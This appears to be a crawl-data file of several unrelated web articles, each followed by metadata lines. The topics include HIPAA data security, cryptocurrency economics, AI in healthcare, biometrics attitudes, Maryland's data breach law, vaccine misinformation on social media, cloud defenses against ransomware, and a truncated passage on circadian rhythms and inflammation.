HIPAA compliance, or Health Insurance Portability and Accountability Act of 1996 Compliance guarantees patients’ that their sensitive and personal information is well secured. HIPAA established industry-wide standards in which all electronic health care transactions must be kept confidential, it also limits the ability of healthcare providers to use or disclose patients’ data information for any type of use unrelated in providing healthcare. Complying with HIPAA should be a priority for every health organization looking to avoid facing penalties once a data breach occurs. Coordinating with companies that offer excellent HIPAA compliance courses will result in a solid knowledge about how HIPAA works and how to best avoid liability scenarios. - Keep sensitive data unexposed and provide layered security to stop hackers from accessing any healthcare information. Masking all your sensitive data can help reduce data breach risks. It’s also a standard measure in complying with data privacy regulations. Integrate bespoke data transformers in your system and maintain data usage without exposing any sensitive details like electronic medical records and electronic health records. The costs and risks in healthcare data cybersecurity breaches are significantly high. Healthcare organizations must also invest in protecting healthcare data to fight and prevent cyber attacks. With how fast the internet changes even in every second, you must be vigilant to every kinds of threats. Always make sure that your database is safe and secure from hackers and fraudsters that may cost you millions of dollars.
<urn:uuid:b6b85a3b-525a-46c5-a29e-ebeb9e21d92b>
CC-MAIN-2022-40
https://www.404techsupport.com/2018/09/17/securing-healthcare-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.917595
808
2.671875
3
Cryptocurrencies have been at the center stage of fintech-related developments for the last couple of years. They have brought about a lot of interest from the general public in the field of cryptography. Reputed universities like Princeton are now offering dedicated courses in mastering blockchains. The modern crypto revolution did not start overnight though. Here we analyze the rationale behind using cryptocurrencies (with a historical perspective), the need behind a global value of store, and the rising demand in this field. For a token to be called “money”, it must satisfy certain requirements; it should be portable, durable, recognizable, scarce, and it should be divisible into proper smaller denominations. Cryptocurrencies fulfill these requirements, and even more. For example, Bitcoin is divisible into 10^8 base units called Satoshis, it can be stored electronically, and it does not atrophy or decay. Moreover, it is backed by proof of work, which ensures its scarcity. In fact the total number of bitcoins to be injected in the market (provided to the miners) over the next few decades has already been estimated very accurately and is capped at 21 million BTC. The idea of cryptocurrencies resonates very well with the idea of “Ideal money” put forward by John Nash in his famous 2002 paper by the same name. In the paper, Nash describes a value of store that can adjust the industrial consumption price index (ICPI) depending upon how the patterns of international trade evolve. For a currency to be called Ideal money, it must be suitable as a value of store that is widely acceptable even outside national boundaries. This is important for people who do not have faith in their own country’s currency, or want to diversify their holdings. Bitcoin paralleled this definition during the severe financial crisis in Cyprus in 2013 when people lost faith in their banking system and started buying BTC, which in turn made the prices soar. Same thing happened again in 2015 during the peak of the Greek financial crisis. Cryptocurrencies potentially have a huge role to play in international trade as well. As the field progresses and new platforms emerge, we finally might get a viable solution to the Triffin dilemma. This paradox arises because of conflict of interest for a country whose currency is used as a global reserve. The gold based standard established in 1944 during the Bretton Woods conference has already been found to be unstable, with United States exiting the pact in an event known as the Nixon shock. The earliest attempt for a neutral solution was that of Bancor, which could not materialize at that time. Cryptocurrencies operate with an assumption of zero trust between the transacting parties, and are not under the control of a single command point. This makes them an ideal replacement for the current system of IMF Special Drawing Rights (SDR). While Bitcoin (and other cryptocurrencies) have characteristics that make them “ideal,” there are several problems that come with them too. All the transactions are irreversible, which means that a faulty payment cannot be undone. Money flows in one direction only. In some systems like Ethereum, it is sometimes possible to execute an inverse transaction, although that depends upon how the contract has been built. An unsolved problem with cryptocurrencies is of linking online identities with real world identities. Different cryptocurrencies take different stands on this issue, depending upon how much tradeoff they can have between the consumer’s privacy and the convenience of doing the transaction (Bitcoin is semi-anonymous). Another “theoretical” concern with a world governed using cryptocurrencies is that nearly all of them are deflationary in nature. This is where two schools of thoughts collide, but a clear majority of economists believe that deflationary economies are not sustainable. Although not of major concern at the present (and probably the reason why it is not discussed enough), currencies like BTC do have a problem with falling into a deflationary spiral. There is no doubt that cryptocurrencies are here to stay, and will grow in market size substantially over the coming years. Various new cryptocurrencies are coming out these days, each doing something differently than the others. Apart from cryptocurrencies like BTC, Dogecoin, and Litecoin, some platforms have also emerged, most notably the Ethereum project. Some new promising cryptocurrencies like trade.io are exploring the field of combining utility tokens with an exchange platform, as detailed in this Trade IO whitepaper. A decentralized blockchain exchange naturally promotes high liquidity because the level of accessibility is much lower than it has been traditionally. Almost anyone can trade any asset, regardless of which currency they’re using or where they’re from – a truly free market. There is no waiting for verification from banks, gathering documents, enduring lengthy registration periods, or fear of unsafe data storage. Moreover, there are few fees because there is little overhead. Apart from cryptocurrencies, the underlying blockchains have also captured people’s imagination lately. Various startups have come up that apply the blockchain technology to solve problems of distributed nature that require consensus among the involved parties. Tech giants like Walmart are using blockchains for supply chain management, while big banks are using it to reimagine their money flow pipeline and for near realtime transactions. This space is surely going to see a lot of development in the coming years.
<urn:uuid:4e91999f-1cf4-4693-a7cc-2272147e4a8a>
CC-MAIN-2022-40
https://www.cio.com/article/227996/the-rationale-behind-cryptocurrencies.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.958621
1,071
2.75
3
Artificial Intelligence in Healthcare and Beyond: Year-in-Review and What to Expect in 2019 Updated: Oct 24, 2020 “We always overestimate the change that will occur in the next two years and underestimate the change that will occur in the next 10.” Bill Gates When it comes to Artificial Intelligence (AI), it is hard to overestimate the amount of change that is already or nearly upon us. AI is ushering in the new era of transformation and rapid growth across every industry. Claims range from futuristic predictions that AI will make absolutely everything in our lives easier to fear-inducing proclamations that AI will take away millions of jobs and lead to ruin. Let’s dive into the current state of this technology and separate fact from fiction. A (Very) Brief History of AI The term Artificial Intelligence was first coined in the late 1950s. This technology makes it possible for computers and machines to recognize patterns in and learn from data and experience to automate variety of tasks across industries, delivering business benefits. The hallmark of AI is that it can learn autonomously -- in other words, on its own. But AI relies heavily on related technologies of Machine Learning (ML), Deep Learning (DL) and Natural Language Processing (NLP). What is interesting about AI, and perhaps a reflection of evolving nature of this technology, is that the scope of Artificial Intelligence keeps shifting. For example, optical character recognition used to be considered AI, but now that it has become ubiquitous and routine, it’s no longer under the AI umbrella. In 1980, it was said that “AI is whatever hasn’t been done yet.” Many definitions of AI exist, with most of them converging on “Artificial” and differing slightly on “Intelligence”. There are also several terms that are often used interchangeably with AI, for example Machine Learning. Rise of AI in Healthcare Artificial Intelligence is increasingly considered the “nervous system” of healthcare and the engine for its growth. Frost & Sullivan estimates that AI health market will reach $6.6 billion by 2021, a compound annual growth rate of 40 percent. In just the next five years, the health AI market will grow more than 10x. AI in health is a constellation of technologies that enable machines to repeatedly sense their environment, understand the data, decide on and execute actions and learn from them in a virtuous circle. Unlike current and legacy technologies that exist to complement humans, the AI today is able to augment human activity. AI in healthcare can already perform administrative functions and is increasingly used in clinical applications. According to a recent analysis from Accenture, key clinical health AI applications combined can potentially create $150 billion in annual savings for the US healthcare economy by 2026. Accenture analysed the top 10 AI applications including dosage error reduction, clinical trial matching and image diagnosis. They identified the following top three AI applications with the greatest near-term value to the health economy and likelihood of adoption: robot-assisted surgery ($40 billion) virtual nursing assistants ($20 billion) administrative workflow assistance ($18 billion) [See the chart below and another graphical representation of this data] Drivers of AI in Clinical Applications Artificial Intelligence is poised to influence and enable significant breakthroughs in nearly every aspect of the human condition. In clinical applications, the promise of this technology is to provide a set of tools to augment the capabilities of health systems and providers, improving their effectiveness and liberating physicians from mundane tasks so they can focus on the human side of medicine. The convergence of internal and external pressures and new opportunities are driving the need for more sophisticated technologies and tools: The onslaught of data. In clinical setting in particular, data-rich technologies such as whole-genome sequencing and mobile device biometrics require physicians to interpret and analyse vast amounts of data from disparate streams. Recent healthcare mandates are mounting pressure on providers and health systems to focus on value based care and provide greater operational efficiency. The rise of consumerism in healthcare. Patients are beginning to demand better and more personalized care. As a result, physicians are being inundated with data requiring more sophisticated interpretation while being expected to perform more efficiently. The solutions are Artificial Intelligence and Machine Learning, which can enhance every stage of patient care, from research and discovery to diagnosis to selection of therapy to monitoring of treatment progress. Therefore, clinical practice will become more efficient, more convenient, more personalized, and more effective. In the future, the data will not be collected solely within the health care setting though. The rise of the Internet of Things (IoT) and proliferation of mobile sensors will allow physicians of the future to monitor, interpret, and respond to additional streams of biomedical data collected remotely and automatically. AI in Other Industries Finance & Banking From bots to sales automation, Artificial Intelligence is helping global brands learn more about their customers to enhance personalization and drive sales. In fact, Gartner says that “by 2020, 85 percent of customer interactions will be managed without a human”. Most enterprise app developers must rely on a variety of legacy data sources making it a challenge to deliver real-time insights. Hence the value of new tools for rapidly developing and deploying important new financial applications and a need for reliable, unified platforms spanning data management, interoperability, transaction processing, and analytics. Organizations are already beginning to use AI to bolster cybersecurity and offer more protections against sophisticated hackers. AI helps by automating complex processes for detecting attacks and reacting to data breaches. According to ESG research, 12 percent of enterprise organizations have already deployed AI-based security analytics extensively, and 27 percent have deployed AI-based security analytics on a limited basis. With the rate of data breaches increasing, machine based security approaches are desperately needed to augment human security analysts. Supply Chain & Logistics AI can help employees find the right information they need faster, enabling them to log information more efficiently and streamline customer operations. The most clear use case for AI in this arena is harnessing the data from the supply chain, analyzing it, identifying patterns, and delivering insights for supply chain managers. In logistics, AI enables predictive analytics, forecasting demand, optimizing routes and handling network management. DHL for example has developed a tool to predict air freight transit time delays in order to enable proactive mitigation. Artificial Intelligence has become Pentagon’s priority. Beyond robotics for military applications, agencies at the federal level are beginning to deploy AI-based interfaces for customer interactions, to enhance compliance, reduce fraud and deliver personalized services. A recent Accenture survey shows that 40 percent of taxpayers reported making a filing error in the last 24 months, with nearly 70 percent of taxpayers saying that they would use AI to improve the results. Given the scale and scope of data across agencies, the Artificial Intelligence opportunities are almost endless. Highlights from 2018: Artificial Intelligence in Action In October 2018, we participated in the InterSystems Global Summit and its inaugural AI Symposium. The Summit was held in San Antonio, Texas. Attendees got an extensive overview of the current landscape and present and future capabilities of Artificial Intelligence. From superb keynotes to experiential workshops, the breadth of current applications of AI on display was mind blowing. Here are the 3 examples that caught our attention in particular. The amazing Rosalind Picard kicked off the AI Symposium by sharing touching stories that led her to discover several phenomena, including stress as a predictor of convulsive seizures. Rosalind is founder and director of the Affective Computing research group at the MIT Media Lab. She also co-founded two companies: Empatica, which creates wearable sensors and analytics to improve health, and Affectiva, which delivers technology to help measure and communicate emotion. Rosalind coined the term Affective Computing, sometimes referred to as Artificial Emotional Intelligence, or Emotion AI. This fascinating interdisciplinary field includes devices and systems that recognize, interpret, process and simulate human emotions or other affective phenomena. Emotion is fundamental to human experience. And with evolving Affective Computing technology, we can better understand the ways emotions impact health, learning, memory, behavior and social interaction. We can advance wellbeing by using new ways to communicate, understand, and respond to emotion. Some of the examples of ongoing efforts include ways to help people with special needs to overcome challenges they face with motivation, communication and emotion regulation and improving human experiences by enabling computers, wearables and robots to receive natural emotional feedback. Another area of advancement is new ways to forecast and prevent depression ahead of any visible signs by using a combination of smartphones, wearables and Machine Learning. Rosalind also discovered a surprising strong connection between the brain and the skin that she has been exploring to predict and prevent major adverse health events. More broadly, the Affective Computing technology coupled with Machine Learning analytics and Artificial Intelligence have a potential to significantly improve people's’ lives, with applications in “autism, epilepsy, depression, PTSD, sleep, stress, dementia, autonomic nervous system disorders, human and machine learning, health behavior change, market research, customer service, and human-computer interaction.” To continue with the theme of Artificial Intelligence, but showing its applications in human creativity, we heard from the brilliant Gil Weinberg. His keynote was about the jazz playing robot, Shimon, who uses algorithms and analytical thinking to give rise to new forms of creativity. With his improvising robotic musicians such as Shimon, Gil has traveled the world, featuring this technology at the dozens of concerts and presentations in festivals and conferences such as SIGGRAPH, DLD and the World Economic Forum in Davos. “Most of what Shimon is playing is generated using a new process where he creates hundreds of melodies offline based on deep learning analysis of large musical data sets,” said Gil. “Then us humans (me and my students) choose melodies we like and orchestrate/structure them into songs. It’s a new form of robot-human collaboration.” “We are now ready to move to the next frontier of real time collaborative improvisation – freestyle rapping, where the hope is that the rapper will be influenced by what Shimon is coming up with and vice versa.” Gil’s newest invention is Travis (also known as Shimi), a smartphone-enabled AI robotic musical companion that is designed to enhance listener’s musical experiences. We left with the clear impression how creative robots can help humans to unlock their own creative potential. AI Through the Years and the Eras Babak Hodjat, dubbed the “inventor of Siri”, delivered the closing keynote of the AI Symposium in a spectacular outdoor setting. Babak took us on a journey through the Artificial Intelligence’s past, present and future. Babak is the inventor of the NLP-based technology currently used in Apple’s Siri. Now he is the CEO and co-founder of Sentient Technologies, the company that “created the world’s most powerful distributed AI platform”. Babak shared the evolution of technologies that used to be called Artificial Intelligence, but now are just commonplace tools. "Our tools are what define us as humans and allow us to change the world”. But while humans strive to develop new tools and invent technologies that change our experience and the world, Babak’s view of Artificial Intelligence is not without scepticism: “AI has over-promised and under-delivered. This is because there is a deep chasm between popular notions of AI, rooted in science fiction, and the reality of the state of AI. I think we need to educate people so that society’s reaction to AI is proportionate to the reality of where it is and its promise, rather than disproportionate to the perceived threat of Science Fiction AI.” Surrounded by the beauty of the setting sun in Texas, Babak shared an impressive and thought provoking panoply of what’s next for AI, including the dawn of artificial humans. He explored the themes discussed earlier in the day by Rosalind Picard, including Affective Machine Learning. “Emotions are fundamental to human memory, and memory is not about the past, it is about the future”. Looking to 2019 and Beyond Stephen Hawking said that Artificial Intelligence could be “the biggest event in the history of our civilization.” We are already seeing the tremendous inroads that AI has made in virtually every industry, from Agriculture and Finance to Manufacturing and Energy to Healthcare and Pharmaceuticals. Despite AI’s rapid expansion, the Artificial Intelligence technology itself is still evolving. AI points towards a future where machines not only do physical work, as they have done since the industrial revolution, but also the “thinking” work – planning, strategizing, prioritizing and making decisions. From Narrow AI to General AI to Superintelligence and beyond. In fact, the definition of what is considered Artificial Intelligence keeps shifting. What used to be called AI even several years ago is now just widely used and familiar technology, and no longer resides under the AI umbrella. It might be the only field of technology where its definition and scope change as technology gets adopted. Artificial Intelligence can already sense, think and act. AI can hear, see and speak through Natural Language Processing, speech recognition and Machine Vision. It can understand, perceive and assist via Machine Learning, Deep Learning and planning and scheduling. And AI can act in physical, cognitive and creative ways through robotic process automation, machine translation and adaptive systems. We are already experiencing many of these powerful abilities on a daily basis, perhaps even without knowing it, as AI is integrated into our everyday applications. Processing Big Data might have been a hallmark of AI in 2015. By contrast, 2018 was the year of using tools, algorithms and platforms for Machine Learning to find adaptive solutions to complex problems. AI is ready to automate increasingly complex processes today, identify trends to create business value, and provide forward-looking intelligence. McKinsey study reports that advances in AI, machine learning and robotics “herald a new era of breakthrough innovation and opportunity”, pushing the frontier “in all facets of business and the economy.” In 2019, we will see smart, predictive technology being rolled out across a wide range of business operations and industries. Yet to us, the most fascinating thing about AI is that it can make people superhuman and at the same time, help us be just more ... human. The future is not “Humans vs AI” but rather “Humans + AI”. And we are excited about what that future brings! For more Artificial Intelligence Predictions for 2019, see our guest post on theInterSystems’ Data Matters blog. About the Authors Evan Kirstel is an internationally recognized thought leader, top technology influencer and B2B marketer. With a social media following of more than 400K and organic reach in the millions, Evan is helping brands achieve massive visibility and scale across the social media landscape in areas like mobile, blockchain, cloud, 5G, Health Tech, IoT, AI, Digital Health, crypto, AR, VR, Big Data, Analytics and Cyber Security. Evan was recently named 4th Most Engaging Digital Marketer by Brand24. LinkedIn & Twitter: @EvanKirstel Irma Rastegayeva is a Consultant and Coach at the intersection of health, technology, humanity and storytelling. Following 20+ year career in product development, consulting and management, Irma combines deep technical expertise with patient advocacy and community engagement at eViRa.Health. Named in the Top 30 Women in Tech, Irma is recognized as a top influencer in DigitalHealth, HealthTech and IoT. Irma serves on the board of the American College of Healthcare Trustees. LinkedIn & Twitter: @IrmaRaste
<urn:uuid:dd9288ba-bd81-4d41-8b3c-1f2d45a9c2b6>
CC-MAIN-2022-40
https://www.evirahealthtechstrategies.com/post/artificial-intelligence-in-healthcare-and-beyond-2019
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00421.warc.gz
en
0.935279
3,288
2.53125
3
A new study finds that the public is warming up to the use of biometric identification technology, but remains wary of tracking applications and is looking to government to set standards in that area. After surveying 1000 people, the Center for Identity at the University of Texas (CID) said on May 10 it found that people are relatively comfortable with the technology. About 68 percent of people were at least somewhat comfortable with providing biometric data to an organization, although comfort level varied by the type of data provided. People feel most comfortable with fingerprint scans, and 58 percent of respondents were very comfortable providing them, the survey said. The study found that government tracking was a major concern for 24 percent of those who were uncomfortable with biometrics, the second most cited reason of concern behind general privacy issues. Governments will have to work to alleviate those fears, as biometrics presents a range of opportunities for deployment going forward, CID said. Facial scans are an area that especially concerned survey respondents–35 percent rated facial recognition as the method they were least comfortable with, and 13 percent said they were not at all comfortable providing facial scans. “This could be influenced by the… negative media coverage relating to the use of facial recognition software for tracking and surveillance purposes,” said CID’s Rachel German and Suzanne Barber, the authors of the report. They said respondents were more comfortable providing biometric data about their children to law enforcement, rather than to private sector firms. Survey results showed that people are looking to government agencies to set the standards for use of biometrics data, as 64 percent think that it’s likely government will set effective safeguards for individual privacy. Eighty-two percent think it’s at least somewhat likely that all Americans will have a biometric ID on file by 2020, the survey found.
<urn:uuid:809941d4-e22d-4797-900a-fe0017fa5d2f>
CC-MAIN-2022-40
https://origin.meritalk.com/articles/study-public-embraces-biometrics-with-reservations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.973233
377
2.515625
3
An Overview of the Maryland Personal Information Protection Act The Maryland Personal Information Protection Act (PIPA) is a privacy law aimed at protecting the privacy of the residents of the State of Maryland. Although Maryland’s privacy laws are not completely comprehensive in the same vein as California’s consumer privacy laws, they do aim to address public concern over the way data is protected. Businesses serving Maryland residents must be aware of these consumer privacy laws and take steps to achieve compliance. Failure to do so can lead to severe financial penalties. Here’s what you need to know about Maryland privacy laws. What is the Maryland Personal Information Protection Act (PIPA)? The Maryland Personal Information Protection Act came into effect in January 2008. Also known as the Maryland Data Breach Notification Law, it’s been regularly amended in response to the growing number of data breaches, whereby consumer data has been lost, stolen, or sold without authorization. It details how businesses collect, use, and disclose data, as well as detailing the rights of consumers with regards to their personal data. What is Personal Information? Maryland data privacy laws specifically define what counts as personal information. This includes a Maryland resident’s first and last names or their initials. However, this information must be in combination with one or more of the following: · Official ID numbers, such as Social Security, passport, driver’s license, or tax identification numbers. · Financial numbers, such as account, credit card, or debit card numbers. · Personal health information, such as details of health insurance policies. · Biometric data. If a business already complies with Federal data protection laws or the more extensive consumer privacy laws of a state like California, the Maryland authorities will consider a business to be in compliance. The chances are your business already complies with Maryland data privacy laws. The majority of compliance consists of organizations implementing a reasonable level of security to protect personal information. This requires creating, adopting, and maintaining a written security policy. It also requires businesses to take reasonable steps to prevent unauthorized access to personal information, Notification of Security Breach The Maryland data breach notification requirements are the main obligations businesses have when handling the personal information of Maryland residents. If there is a security breach, businesses are required to inform affected consumers within 45 days of the breach. The business must also conduct a prompt investigation into the breach. Notices must be made to consumers in writing unless more than 175,000 people are affected, in which case a post on the website or via email is acceptable. Any notice must urge the consumer to change their passwords and security questions. A security breach notification must detail all compromised information, provide the business’s contact information, and provide a statement that informs consumers how they can get advice on preventing identity theft via the FTC and OAG. It also must include the following third-party addresses and toll-free numbers: · TransUnion, Experian, and Equifax (the main credit reporting agencies). · The Maryland Office of the Attorney General (OAG). · The Federal Trade Commission (FTC). Amendments were made to the Maryland data privacy laws in 2019 to expand the mandate of PIPA. The laws now apply not only to businesses that own or license personal information but to businesses that maintain it. The 2019 amendments require organizations to conduct an investigation in the event of a breach and restricts how businesses can use breach related information. Under the new rules, businesses may only use breach-related data to notify affected consumers, protect personal information, and to inform national information security bodies about the breach. Does Maryland’s PIPA Apply to My Business? The provisions of the Maryland Personal Information Protection Act previously only applied to businesses that owned or licensed the personal information of the state’s residents. The 2019 amendments to the Maryland breach notification law required all businesses that maintain personal information to comply with PIPA. In other words, if your organization does business within Maryland and it licenses, maintains, or owns the personal information of Maryland residents, PIPA now applies to your business. The laws apply regardless of the size of your business and whether or not you’re physically located within the state. Penalties for Non-Compliance A violation of Maryland privacy laws is classified as a deceptive or unfair trade practice, according to the Consumer Protection Act of Maryland. In other words, violations can be classified as a criminal offense. Civil penalties start at $1,000 for a first violation and $5,000 for subsequent violations. The law also allows for private consumers to not only sue for damages, but they may also sue to recover attorney fees. The threat of private legal action means that organizations that fail to secure consumers’ personal information properly could find themselves facing expensive legal battles, with potentially unlimited financial penalties. If you want to learn more about compliance best practices, learn how Delphix provides an API-first data platform enabling teams to find and mask sensitive data for compliance with privacy regulations.
<urn:uuid:7537864e-1106-4bb1-95fa-a669a0966bb5>
CC-MAIN-2022-40
https://www.delphix.com/glossary/maryland-personal-information-protection-act
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.926283
1,057
2.578125
3
Individuals and groups that spread medical misinformation are well organized to exploit the weaknesses of the engagement-driven ecosystems on social media platforms. With less than half the United States population fully vaccinated for COVID-19 and as the delta variant sweeps the nation, the U.S. surgeon general issued an advisory that called misinformation an urgent threat to public health. The advisory said efforts by social media companies to combat misinformation are “too little, too late and still don’t go far enough.” The advisory came more than a year after the World Health Organization warned of a COVID-related “infodemic.” There’s good reason to be concerned. A study in the U.K. and the U.S. found that exposure to online misinformation about COVID-19 vaccines reduced the number of people who said they would get vaccinated and increased the number of people who said they would not. As a researcher who studies social media, I can recommend ways social media companies, in collaboration with researchers, can develop effective interventions against misinformation and help build trust and acceptance of vaccines. The government could intervene, but a bill to curb medical misinformation on social media filed in July is revealing some of the challenges – it’s drawing scorn for leaving to a political appointee decisions about what constitutes misinformation. A serious threat in online settings is that fake news spreads faster than verified and validated news from credible sources. Articles connecting vaccines and death have been among the content people engage with most. Algorithms on social media platforms are primed for engagement. Recommendation engines in these platforms create a rabbit-hole effect by pushing users who click on anti-vaccine messages toward more anti-vaccine content. Individuals and groups that spread medical misinformation are well organized to exploit the weaknesses of the engagement-driven ecosystems on social media platforms. Social media is being manipulated on an industrial scale, including a Russian campaign pushing disinformation about COVID-19 vaccines. Researchers have found that people who rely on Facebook as their primary source of news about the coronavirus are less likely to be vaccinated than people who get their coronavirus news from any other source. While social media companies have actively tagged and removed misinformation about COVID-19 generally, stories about vaccine side effects are more insidious because conspiracy theorists may not be trafficking in false information as much as engaging in selectively distorting risks from vaccination. These efforts are part of a well-developed disinformation ecosystem on social media platforms that extends to offline anti-vaccine activism. Misinformation on social media may also fuel vaccine inequities. There are significant racial disparities among COVID-19 vaccine recipients so far. For example, though vaccine-related misinformation is not the only source of these differences, health-related misinformation is rife on Spanish-language Facebook. Here are two key steps social media companies can take to reduce vaccine-related misinformation. Block known sources of vaccine misinformation There have been popular anti-vaccine hashtags such as #vaccineskill. Though it was blocked on Instagram two years ago, it was allowed on Facebook until July 2021. Aside from vaccines, misinformation on multiple aspects of COVID-19 prevention and treatment abounds, including misinformation about the health benefits of wearing a mask. Twitter recently suspended U.S. Rep. Marjorie Taylor Greene for a couple of days, citing a post of COVID misinformation. But social media companies could do a lot more to block disinformation spreaders. Reports suggest that most of the vaccine disinformation on Facebook and Twitter comes from a dozen users who are still active on social media referred to as the disinformation dozen. The list is topped by businessman and physician Joseph Mercola and prominent anti-vaccine activist Robert F. Kennedy Jr. Evidence suggests that infodemic superspreaders engage in coordinated sharing of content, which increases their effectiveness in spreading disinformation and, correspondingly, makes it all the more important to block them. Social media platforms need to more aggressively flag harmful content and remove people known to traffic in vaccine-related disinformation. Disclose more about medical misinformation Facebook claims that it has taken down 18 million pieces of coronavirus misinformation. However, the company doesn’t share data about misinformation on its platforms. Researchers and policymakers don’t know how much vaccine-related misinformation is on the platforms and how many people are seeing and sharing misinformation. Another challenge is distinguishing between different types of engagement. My own research studying medical information on YouTube found different levels of engagement, people simply viewing information that’s relevant to their interests and people commenting on and providing feedback about the information. The issue is how vaccine-related misinformation fits into people’s preexisting beliefs and to what extent their skepticism of vaccines is accentuated by what they are exposed to online. Social media companies can also partner with health organizations, medical journals and researchers to more thoroughly and credibly identify medical misinformation. Researchers who are working to understand how misinformation spreads rely on social media companies to conduct research about users’ behavior on their platforms. For instance, what researchers do know about anti-vaccine disinformation on Facebook comes from Facebook’s CrowdTangle data analysis tool for public information on the platforms. Researchers need more information from the companies, including ways to spot bot activity. Facebook could follow its own example from when it provided data to researchers seeking to uncover Russian fake news campaigns targeted at African American voters. Data about about social media will help researchers answer key questions about medical misinformation, and the answers in turn could lead to better ways of countering the misinformation. Anjana Susarla is an Omura-Saxena Professor of Responsible AI at Michigan State University.
<urn:uuid:4552e060-be32-4aac-a751-1fbfb30419ec>
CC-MAIN-2022-40
https://www.nextgov.com/ideas/2021/07/big-tech-has-vaccine-misinformation-problem-heres-what-social-media-expert-recommends/184182/?oref=ng-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00421.warc.gz
en
0.943982
1,161
2.671875
3
Many organizations wonder why ransomware attacks avoid the cloud as they see constant news of organizations being affected by cyber criminals and hackers. Ransomware threatens all industries and a recent SonicWall annual threat report for 2021 reveals a 231.7 percent increase in ransomware attacks since 2019. In addition, the CISA, NSA, and FBI have all released an advisory stating that hackers are franchising their ransomware tools to less experienced hackers. Organizations must protect against ransomware attacks as part of their overall cybersecurity strategy. Proactively protecting endpoints from ransomware is mandatory. Ransomware is less of a threat if your organization is in the cloud. What Is Ransomware? Data breaches involve stolen data, not ransomware. Ransomware is software that takes control of a system and then encrypts data so that it cannot be accessed until you pay a ransom. Organizations can be crippled by this, effectively shut down until they can regain access to data. Cloud environments are not seeing ransomware attacks, despite ransomware being a major cyber threat. A New Cyber Security Threat Landscape Cloud control functions include building virtual servers, changing network routes, and gaining access to databases. Cloud management is controlled by the API control plane. A cloud platform provider like Amazon, Google, or Microsoft matters most to your data’s security and resilience. The cloud makes replicating data cheap and easy. A well-architected cloud environment ensures your data is backed up multiple times. The key to blocking ransomware is multiple copies of your data to reduce the hacker’s ability to lock you out. The latest version of the data prior to the encryption can be reverted if an attacker encrypts your data and demands ransom. Good design and architecture are critical for cloud security, not intrusion detection and security analysis. They are not trying to compromise your network to lock you out; they are trying to exploit cloud misconfigurations to exploit your cloud APIs and steal data right from under your nose. What Is Cloud Misconfiguration? A cloud misconfiguration can range from a simple misconfiguration of a particular resource, such as leaving a port open to an architectural weakness that attackers can exploit to turn a small misconfiguration into a giant cyber security hole. If your organization operates in the cloud, your environment has both kinds of vulnerabilities. Since cloud services is software, these types of cyberattacks can be prevented with a proactive approach. A managed IT services Toronto provider can help plan this out. Build Cloud Security on Policy Cloud services infrastructure is designed and built so you don’t have to avoid the cloud. Managed IT services providers or developers own that process which changes the IT security team’s role fundamentally. With a organization wide policy, an organization can state their security and compliance policies in a language that is clear and eliminate any configuration issues. You can use it to detect undesired conditions or things in running the cloud environment. This makes it possible for all cloud services to operate securely without ambiguity or disagreement about what the rules are and how they should be applied. Harden Your Cloud Services Security Posture Why ransomware attacks avoid the cloud? Simple, there are some guideline that all organizations must follow to be effective with cloud security as well as harden its cloud security posture: - Take action. Hackers use automation to detect misconfigurations in cloud environments. Regular cloud security audits are insufficient. Continuously assess your cloud environment with your managed IT services provider or IT department. - Don’ react, be proactive. Do not turn away from intrusion detection however there should be a large focus on preventing misconfiguration vulnerabilities. Cyberattacks on cloud services happen too fast for any technology or team to stop them in progress. A managed IT services Toronto provider will have tools in place to stop and proactively manage. - Develop your team. Proactive cyber security training empowers them to proactively protect the company. This in combination with your managed IT services provider being proactive will result in a better position to prevent misconfigurations. - Identify and measure. Create a list of processes, services, and data. This will allow you to measure cyber security measures and take a proactive approach with your managed IT services. This will prevent vulnerabilities and the resulting security incidents. Proactive cyber security prevention is the best form of defense. To quickly identify and remedy cyber security misconfigurations. Why ransomware attacks avoid the cloud? Simple, it is much easier to secure. Our complimentary data breach scan will be able to review if your credentials have been compromised by cyber criminals and hackers. We are the leading managed IT services Toronto. Our boutique Toronto IT consulting firm specializes in award winning Managed IT Services, Tech Support Services, Cloud Services, Cyber Security Training and Dark Web Monitoring, Business continuity and disaster recovery (BCDR), IT Support Services, Managed Security Services, and IT Outsourcing Services. We Make IT Simple!
<urn:uuid:56f5a77b-b3ef-4118-b862-12054b48ee10>
CC-MAIN-2022-40
https://365itsolutions.com/tag/why-ransomware-attacks-avoid-the-cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00421.warc.gz
en
0.924561
997
2.765625
3
New research from RCSI has demonstrated the significant role that an irregular body clock plays in driving inflammation in the body’s immune cells, with implications for the most serious and prevalent diseases in humans. Published in Frontiers in Immunology, the research was led by the School of Pharmacy and Biomolecular Sciences at RCSI University of Medicine and Health Sciences. The circadian body clock generates 24-hour rhythms that keep humans healthy and in time with the day/night cycle. This includes regulating the rhythm of the body’s own (innate) immune cells called macrophages. When these cell rhythms are disrupted (due to things like erratic eating/sleeping patterns or shift work), the cells produce molecules which drive inflammation. This can lead to chronic inflammatory diseases such as heart disease, obesity, arthritis, diabetes and cancer, and also impact our ability to fight infection. In this study, the researchers looked at these key immune cells called macrophages with and without a body clock under laboratory conditions. They were interested to understand if macrophages without a body clock might use or ‘metabolise’ fuel differently, and if that might be the reason these cells produce more inflammatory products. The researchers found that macrophages without a body clock took up far more glucose and broke it down more quickly than normal cells. They also found that, in the mitochondria (the cells energy powerhouse), the pathways by which glucose was further broken down to produce energy were very different in macrophages without a clock. This led to the production of reactive oxygen species (ROS) which further fuelled inflammation. Dr. George Timmons, lead author on the study, said: “Our results add to the growing body of work showing why disruption of our body clock leads to inflammatory and infectious disease, and one of the aspects is fuel usage at the level of key immune cells such as macrophages.” Dr. Annie Curtis, senior lecturer at RCSI School of 